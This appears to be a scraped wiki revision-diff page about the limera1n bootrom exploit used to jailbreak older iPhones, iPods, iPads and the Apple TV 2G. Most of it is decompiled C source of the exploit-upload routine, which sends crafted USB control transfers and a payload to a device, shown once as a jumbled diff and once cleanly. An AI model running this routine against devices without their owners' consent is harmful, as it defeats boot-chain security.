|
The iPhone Wiki is no longer updated. Visit this article on The Apple Wiki for current information. |
Difference between revisions of "Limera1n Exploit"
(i do not get that) |
m (it was a prob with line endings) |
||
| Line 1: | Line 1: | ||
| + | {{lowercase}} |
||
| − | Limera1n exploit is the [[bootrom]] exploit used to jailbreak the [[N88ap|iPhone 3GS]], [[N18ap|iPod touch 3G]], [[N81ap|iPod touch 4G]], [[K48ap|iPad]], [[N90ap|iPhone 4 GSM]], [[N92ap|iPhone 4 CDMA]], and the [[K66ap|Apple TV 2G]]. It was first used in the [[limera1n]] tool by [[geohot]]. It is actively used on all the supported devices to jailbreak current versions of [[iOS]], usually a [[tethered jailbreak]] unless there is an untether created or 24kpwn is used on [[iBoot-359.3]] |
||
| + | The '''limera1n exploit''' is the [[bootrom]] exploit used to jailbreak the [[N88ap|iPhone 3GS]], [[N18ap|iPod touch 3G]], [[N81ap|iPod touch 4G]], [[K48ap|iPad]], [[N90ap|iPhone 4 GSM]], [[N92ap|iPhone 4 CDMA]], and the [[K66ap|Apple TV 2G]]. It was first used in the [[limera1n]] tool by [[User:geohot|geohot]]. It is actively used on all the supported devices to jailbreak current versions of [[iOS]], usually a [[tethered jailbreak]] unless there is an untether created or 24kpwn is used on [[iBoot-359.3]] |
||
| − | == |
+ | ==Source Code== |
| + | signed int __cdecl upload_exploit()
{ |
||
| − | <pre> |
||
| + | int v0; // eax@1
|
||
| − | signed int __cdecl upload_exploit()
{ |
||
| − | + |
int v2; // ebx@2 |
|
| − |
int |
+ |
int v3; // eax@4
|
| − | + | char *v4; // eax@5 |
|
| − | + |
unsigned int v5; // ebx@8 |
|
| − | + |
int v6; // ecx@14 |
|
| − | + |
signed int result; // eax@15 |
|
| − |
signed int |
+ |
signed int v8; // ST38_4@18 |
| − | + |
int v9; // eax@28
|
|
| − | + | signed int v10; // [sp+38h] [bp-1030h]@4
|
|
| − | signed int |
+ | signed int v11; // [sp+3Ch] [bp-102Ch]@2
|
| − | + | char v12; // [sp+4Ch] [bp-101Ch]@3 |
|
| − | + |
char v13; // [sp+84Ch] [bp-81Ch]@5
|
|
| − | + | int v14; // [sp+104Ch] [bp-1Ch]@1 |
|
| + | v14 = *MK_FP(__GS__, 20);
|
||
| − | int v14; // [sp+104Ch] [bp-1Ch]@1 |
||
| + | |||
| − | v0 = *(_DWORD *)(device + 16);
|
||
| + | if ( v0 == 8930 )
{
|
||
| − | |||
| + |
}
else
{
|
||
| − | v2 = -2080129124; |
||
| + | v2 = (((v0 == 8920) – 1) & 0xFFFFFFF4) – 2080161884; |
||
| − | v11 = 141312;
|
||
| + |
}
|
||
| − | v2 = (((v0 == 8920) – 1) & 0xFFFFFFF4) – 2080161884; |
||
| + | memset(&v12, 0, 0×800u);
|
||
| − | |||
| + | |||
| − | memcpy(&v12, exploit, 0×230u); |
||
| + |
if (libpois0n_debug)
{
|
||
| − | |||
| + | v8 = v1; |
||
| − |
if (libpois0n_debug)
{
|
||
| + |
((void (__cdecl *)(int, signed int, _DWORD))__fprintf_chk)(stderr, 1, “Resetting device counters\n”); |
||
| − | v8 = v1; |
||
| + | v1 = v8; |
||
| − |
((void (__cdecl *)(int, signed int, _DWORD))__fprintf_chk)(stderr, 1, “Resetting device counters\n”); |
||
| + | v3 = irecv_reset_counters(client); |
||
| − | v10 = v1;
|
||
| + | |||
| − | v3 = irecv_reset_counters(client); |
||
| + |
if ( v3 )
{
|
||
| − | |||
| − | + | result = -1;
|
|
| − | + | }
else
{
|
|
| + | memset(&v13, -858993460, 0×800u); |
||
| − | }
else
{
|
||
| − | + | do
{
|
|
| − | + | *(_DWORD *)v4 = 1029;
|
|
| − | *(_DWORD *)v4 = |
+ | *((_DWORD *)v4 + 1) = 257; |
| − | *((_DWORD *)v4 + |
+ | *((_DWORD *)v4 + 2) = v10; |
| − | + | *((_DWORD *)v4 + 3) = v2;
|
|
| − | + | v4 += 64; |
|
| − | v4 |
+ |
}
while ((int *)v4 != &v14); |
| − | + | ||
| − | + |
if (libpois0n_debug)
|
|
| + | ((void (__cdecl *)(int, signed int, _DWORD))__fprintf_chk)(stderr, 1, “Sending chunk headers\n”); |
||
| − |
if (libpois0n_debug)
|
||
| + | |||
| − | ((void (__cdecl *)(int, signed int, _DWORD))__fprintf_chk)(stderr, 1, “Sending chunk headers\n”); |
||
| + |
irecv_control_transfer(client, 33, 1, 0, 0, &v13, 2048);
|
||
| − |
v5 = 0; |
||
| + | |||
| − | memset(&v13, -858993460, 0×800u);
|
||
| + |
}
while (v5 < v11); |
||
| − |
irecv_control_transfer(client, 33, 1, 0, 0, &v13, 2048); |
||
| + |
((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Sending exploit payload\n"); |
||
| − |
if (libpois0n_debug) |
||
| + | |||
| − |
((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Sending exploit payload\n"); |
||
| + |
irecv_control_transfer(client, 33, 1, 0, 0, &v12, 2048); |
||
| − | |||
| + | |||
| − |
irecv_control_transfer(client, 33, 1, 0, 0, &v12, 2048); |
||
| + |
((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Sending fake data\n");
|
||
| − |
if (libpois0n_debug) |
||
| + | |||
| − |
((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Sending fake data\n");
|
||
| + | memset(&v13, -1145324613, 0x800u);
|
||
| − | |||
| − | irecv_control_transfer(client, |
+ | irecv_control_transfer(client, 33, 1, 0, 0, &v13, 2048); |
| + | |||
| − | irecv_control_transfer(client, 33, 1, 0, 0, &v13, 2048); |
||
| + | ((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Executing exploit\n"); |
||
| − | if (libpois0n_debug)
|
||
| + | |||
| − | ((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Executing exploit\n"); |
||
| + |
irecv_control_transfer(client, 33, 2, 0, 0, &v13, 0); |
||
| − | |||
| − | + |
irecv_reset(client); |
|
| − | + |
irecv_finish_transfer(client);
|
|
| + | |||
| − |
irecv_finish_transfer(client);
|
||
| + |
((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Exploit sent\n"); |
||
| − | if (libpois0n_debug)
{ |
||
| + | if (libpois0n_debug) |
||
| − |
((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Exploit sent\n"); |
||
| + | ((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Reconnecting to device\n");
|
||
| − |
if (libpois0n_debug)
|
||
| + | } |
||
| − | ((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Reconnecting to device\n");
|
||
| + |
client = (void *)irecv_reconnect(client, 2u); |
||
| − | |||
| + | |||
| − |
client = (void *)irecv_reconnect(client, 2u); |
||
| − | + | signed int v1; // edx@2 |
|
| − | + | v0 = *(_DWORD *)(device + 16);
|
|
| − | + | v11 = 174080;
|
|
| − | + | v1 = -2080198655;
|
|
| − | + | v2 = -2080129124; |
|
| − | + | v1 = -2080231423;
|
|
| − | + | v11 = 141312;
|
|
| − | + | ||
| − | + | memcpy(&v12, exploit, 0×230u); |
|
| − | + | } |
|
| − | + | ||
| − | + | v10 = v1;
|
|
| − | + | irecv_strerror(v3);
|
|
| − | + | __fprintf_chk(stderr, 1, &aCannotFindS[12]);
|
|
| − | + |
v4 = &v13;
|
|
| − | + | ||
| − | + |
v5 = 0; |
|
| − | + | memset(&v13, -858993460, 0×800u);
|
|
| − | + | do
{
|
|
| − | + | v5 += 2048; |
|
| − | + |
irecv_control_transfer(client, 33, 1, 0, 0, &v13, 2048); |
|
| − | + | ||
| − | + |
if (libpois0n_debug) |
|
| − | + |
if (libpois0n_debug) |
|
| − | + | irecv_control_transfer(client, 161, 1, 0, 0, &v13, 2048);
|
|
| − | + | if (libpois0n_debug) |
|
| − | + | if (libpois0n_debug)
{ |
|
| − | + | ||
| − | + |
if (client)
{
|
|
| − | + | result = 0;
|
|
| − | + | }
else
{ |
|
| − | }
else
{ |
||
if (libpois0n_debug)
{
|
if (libpois0n_debug)
{
|
||
| − | v9 = irecv_strerror(0); |
+ | v9 = irecv_strerror(0); |
| − | + | __fprintf_chk(stderr, 1, &aCannotFindS[12], v9); |
|
| − | } |
+ | } |
| − | __fprintf_chk(stderr, 1, "Unable to reconnect\n");
|
+ | __fprintf_chk(stderr, 1, "Unable to reconnect\n");
|
| − | result = -1;
|
+ | result = -1;
|
| − | }
|
+ | }
|
| − | } |
+ | } |
| − |
if (*MK_FP(__GS__, 20) != v14)
|
+ |
if (*MK_FP(__GS__, 20) != v14)
|
| − | __stack_chk_fail(v6, *MK_FP(__GS__, 20) ^ v14);
|
+ | __stack_chk_fail(v6, *MK_FP(__GS__, 20) ^ v14);
|
| − | + | ||
| − | return result;
|
+ | return result;
|
| − | } |
+ | } |
| − | </pre> |
||
[[Category:Exploits]] |
[[Category:Exploits]] |
||
Revision as of 08:32, 1 January 2012
The limera1n exploit is the bootrom exploit used to jailbreak the iPhone 3GS, iPod touch 3G, iPod touch 4G, iPad, iPhone 4 GSM, iPhone 4 CDMA, and the Apple TV 2G. It was first used in the limera1n tool by geohot. It is actively used on all the supported devices to jailbreak current versions of iOS, usually a tethered jailbreak unless there is an untether created or 24kpwn is used on iBoot-359.3
Source Code
signed int __cdecl upload_exploit()
{
int v0; // eax@1
signed int v1; // edx@2
int v2; // ebx@2
int v3; // eax@4
char *v4; // eax@5
unsigned int v5; // ebx@8
int v6; // ecx@14
signed int result; // eax@15
signed int v8; // ST38_4@18
int v9; // eax@28
signed int v10; // [sp+38h] [bp-1030h]@4
signed int v11; // [sp+3Ch] [bp-102Ch]@2
char v12; // [sp+4Ch] [bp-101Ch]@3
char v13; // [sp+84Ch] [bp-81Ch]@5
int v14; // [sp+104Ch] [bp-1Ch]@1
v14 = *MK_FP(__GS__, 20);
v0 = *(_DWORD *)(device + 16);
if ( v0 == 8930 )
{
v11 = 174080;
v1 = -2080198655;
v2 = -2080129124;
}
else
{
v1 = -2080231423;
v11 = 141312;
v2 = (((v0 == 8920) – 1) & 0xFFFFFFF4) – 2080161884;
}
memset(&v12, 0, 0×800u);
memcpy(&v12, exploit, 0×230u);
if (libpois0n_debug)
{
v8 = v1;
((void (__cdecl *)(int, signed int, _DWORD))__fprintf_chk)(stderr, 1, “Resetting device counters\n”);
v1 = v8;
}
v10 = v1;
v3 = irecv_reset_counters(client);
if ( v3 )
{
irecv_strerror(v3);
__fprintf_chk(stderr, 1, &aCannotFindS[12]);
result = -1;
}
else
{
memset(&v13, -858993460, 0×800u);
v4 = &v13;
do
{
*(_DWORD *)v4 = 1029;
*((_DWORD *)v4 + 1) = 257;
*((_DWORD *)v4 + 2) = v10;
*((_DWORD *)v4 + 3) = v2;
v4 += 64;
}
while ((int *)v4 != &v14);
if (libpois0n_debug)
((void (__cdecl *)(int, signed int, _DWORD))__fprintf_chk)(stderr, 1, “Sending chunk headers\n”);
v5 = 0;
irecv_control_transfer(client, 33, 1, 0, 0, &v13, 2048);
memset(&v13, -858993460, 0×800u);
do
{
v5 += 2048;
irecv_control_transfer(client, 33, 1, 0, 0, &v13, 2048);
}
while (v5 < v11);
if (libpois0n_debug)
((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Sending exploit payload\n");
irecv_control_transfer(client, 33, 1, 0, 0, &v12, 2048);
if (libpois0n_debug)
((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Sending fake data\n");
memset(&v13, -1145324613, 0x800u);
irecv_control_transfer(client, 161, 1, 0, 0, &v13, 2048);
irecv_control_transfer(client, 33, 1, 0, 0, &v13, 2048);
if (libpois0n_debug)
((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Executing exploit\n");
irecv_control_transfer(client, 33, 2, 0, 0, &v13, 0);
irecv_reset(client);
irecv_finish_transfer(client);
if (libpois0n_debug)
{
((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Exploit sent\n");
if (libpois0n_debug)
((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Reconnecting to device\n");
}
client = (void *)irecv_reconnect(client, 2u);
if (client)
{
result = 0;
}
else
{
if (libpois0n_debug)
{
v9 = irecv_strerror(0);
__fprintf_chk(stderr, 1, &aCannotFindS[12], v9);
}
__fprintf_chk(stderr, 1, "Unable to reconnect\n");
result = -1;
}
}
if (*MK_FP(__GS__, 20) != v14)
__stack_chk_fail(v6, *MK_FP(__GS__, 20) ^ v14);
return result;
}
